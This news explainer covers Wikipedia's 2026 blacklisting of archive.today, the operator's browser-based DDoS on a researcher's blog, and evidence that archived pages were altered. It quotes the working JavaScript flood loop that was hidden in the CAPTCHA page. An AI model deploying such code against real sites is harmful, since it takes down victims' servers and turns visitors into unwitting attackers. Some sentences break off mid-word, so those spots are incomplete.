Wikipedia vs Archive.today: The Web Preservation War

Wikipedia blacklisted archive.today on February 20, 2026, initiating the removal of approximately 695,000 links from around 400,000 English-language pages. The ban followed two distinct violations: the site’s operator embedded JavaScript into its CAPTCHA page to conduct a distributed denial-of-service attack, and editors presented evidence that archived pages had been retroactively altered.

What Is Archive.today—and Why Did Wikipedia Depend on It?

Archive.today (also operating under the domains archive.is, archive.ph, archive.md, and others) is a web archiving service that captures static snapshots of web pages on demand. Unlike the Internet Archive’s Wayback Machine, which crawls the web automatically and at scale, archive.today creates captures manually or on-request—making it particularly useful for preserving individual articles, paywalled content, and pages that block automated crawlers.

For Wikipedia editors, the service filled a critical operational gap. The encyclopedia’s citation policies require verifiable sources, and link rot—dead URLs pointing to pages that no longer exist—poses a persistent structural threat. An archived copy of a citation source provides a stable fallback. Over time, archive.today accumulated nearly 700,000 embedded links in English Wikipedia alone, making it the second-most cited web archive after the Wayback Machine.¹

This dependency made the February 2026 blacklist decision consequential at a scale few editorial disputes reach.

How the DDoS Unfolded

The sequence of events began well before February. In 2023, a Finnish blogger and researcher using the name Jani Patokallio published an OSINT investigation on his site Gyrovague.com examining archive.today’s ownership, funding sources, and the anonymity of its operator—a figure known only by the pseudonym “Nora.”²

That investigation drew no immediate retaliation. Then, in November 2025, the FBI subpoenaed domain registrar Tucows seeking identifying information about archive.today’s operator in connection with a federal criminal investigation.³ News coverage of the subpoena cited Patokallio’s 2023 report prominently.

The operator’s response was not legal action. Starting approximately January 11, 2026, archive.today modified its CAPTCHA splash page—the interstitial page users must complete before viewing an archived capture—to include hidden JavaScript code.

setInterval(function() {
  fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2, 3 + Math.random() * 8), {
    referrerPolicy: "no-referrer"
  });
}, 300);

Every 300 milliseconds, for as long as a visitor kept the CAPTCHA page open, the code sent a randomized search request to Patokallio’s blog. The randomized string parameters prevented caching, ensuring each request consumed actual server resources. Patokallio documented the attack publicly on February 1, 2026.⁴

The attack escalated beyond JavaScript. Patokallio published emails from the archive.today operator demanding removal of the 2023 investigation post. When Patokallio declined, the operator reportedly threatened him with AI-generated pornography.⁵ The operator also posted public criticism of Patokallio on archive.today’s own blog.

The Archive Tampering Problem

The DDoS attack alone might have been enough to prompt Wikipedia’s decision. What made the ban near-unanimous among editors was a second, separate concern: evidence that archive.today’s operators had altered the content of archived pages.

The most discussed instance involved a blog post Patokallio cited in his February 2026 write-up. Editors examining the archive.today capture of that post found that the operator had inserted Patokallio’s name into the archived version—a modification that had no basis in the original source.⁶

This discovery undermined archive.today’s core value proposition. Web archives derive their legitimacy from immutability: a snapshot is useful precisely because it preserves the original state of a source. An archive whose operator can retroactively edit stored content is not an archive in any meaningful sense. It is a mutable document controlled by a third party with a demonstrated willingness to manipulate records in personal disputes.

Wikipedia’s Decision Process

The ban emerged from a formal community process. Wikipedia editors opened a Request for Comment (RfC) that drew more than 200 participants—an unusually high number for an editorial policy question.⁷ The consensus reached two conclusions:

1. Immediate deprecation: No new links to archive.today should be added.
2. Active removal: Existing links should be removed from the encyclopedia, either through the spam blacklist or an edit filter.

This is the second time archive.today has appeared on Wikipedia’s blacklist. The site was banned in 2013, reinstated in 2016, and has now been banned again with broader community support and a documented technical case.⁸

The Scale and Practical Impact

Removing 695,000 links is not a trivial operation. Many of those links serve as citation backups for claims that may no longer be verifiable through any other archived source. Wikipedia’s bot infrastructure—including tools like WP

What This Reveals About Web Archiving Infrastructure

The archive.today situation exposes a structural tension in how the open web preserves itself. Web archiving has historically relied on a small number of services—most of them operating with minimal transparency about their operators, funding, and governance. The Wayback Machine is a nonprofit with public accountability structures. Archive.today operated as an anonymous service with no disclosed operator, no formal governance, and no mechanism for challenging editorial decisions about what to archive, what to modify, or whom to target.

The FBI investigation that preceded the DDoS attack illustrates how unresolved anonymity creates risks for services that accumulate institutional trust. Archive.today’s operator responded to scrutiny not by increasing transparency, but by attacking a researcher who had published findings about the site.

The broader implication is that web preservation infrastructure is more fragile than it appears. A single operator with access to a widely-trusted archive service can—if motivated—corrupt the historical record for thousands of citations simultaneously. Wikipedia’s 695,000 affected links represent one visible slice of that vulnerability.

What Comes Next

Wikipedia’s bot-assisted removal process began immediately after the RfC closed. Editors face the task of replacing or flagging hundreds of thousands of citations, many of which covered content that may no longer be accessible through any other means. In cases where the only surviving copy of a cited source exists in archive.today’s database, editors must choose between using an archive operated by an actor Wikipedia has determined to be untrustworthy, or leaving a citation unverifiable.

Archive.today itself continues to operate. The site has not removed the DDoS code publicly, though the attack appears to have stopped following exposure. The FBI investigation into the operator’s identity remains unresolved as of late February 2026, with Tucows having confirmed it complies with valid legal process.¹⁰

The episode sets a precedent: Wikipedia’s editorial community demonstrated that it will move decisively against archiving services when those services demonstrate malicious operator behavior, even at significant operational cost to the encyclopedia itself.

Frequently Asked Questions

Q: Why did Wikipedia ban archive.today? A: Wikipedia blacklisted archive.today in February 2026 after the site’s operator embedded DDoS-launching JavaScript into its CAPTCHA page—turning visitors into unwitting attackers—and evidence emerged that archived pages had been retroactively altered, making the service unreliable as a citation source.

Q: How many Wikipedia links are affected by the ban? A: Approximately 695,000 links across around 400,000 English-language Wikipedia pages will be removed as a result of the ban, making this one of the largest single citation infrastructure changes in Wikipedia’s history.

Q: What alternatives can Wikipedia editors use for web archiving? A: Wikipedia’s approved archives include the Internet Archive’s Wayback Machine (the primary alternative), Perma.cc for legal and academic citations, and other services listed at WP

Q: Has archive.today been banned from Wikipedia before? A: Yes. Archive.today was banned from Wikipedia in 2013 and reinstated in 2016. The 2026 ban is the second such action, this time backed by a documented technical case and an RfC with over 200 participants.

Q: Was the DDoS attack illegal? A: The FBI opened a federal criminal investigation into archive.today’s operator in late 2025, subpoenaing domain registrar Tucows for identifying information. The nature of the criminal charges was not disclosed, but the browser-based DDoS attack—which used visitors’ computers without consent—occurred after that investigation was already underway.

Sources:

• Archive.today links banned at Wikipedia after operator edits archived URLs - Boing Boing
• Wikipedia
  .today guidance - Wikipedia
• Wikipedia may remove nearly 700,000 links after Archive.today DDoS fallout - TechSpot
• Wikipedia officially blacklists all links to Archive Today - Tom’s Hardware
• Wikipedia blacklists Archive.today after alleged DDoS attack - TechRadar
• Wikipedia blacklists Archive.today after alleged DDoS attack - TechCrunch
• archive.today is directing a DDOS attack against my blog - Gyrovague
• Archive.today weaponizes visitors in a DDoS attack - Cybernews
• FBI Tries to Unmask Owner of Infamous Archive.is Site - 404 Media
• FBI Subpoenas Registrar for Details on Anonymous Archiving Site Owner - Slashdot
• Hundreds of thousands of links: Wikipedia bans Archive.today after cyberattack - heise online
• Wikipedia
  rot - Wikipedia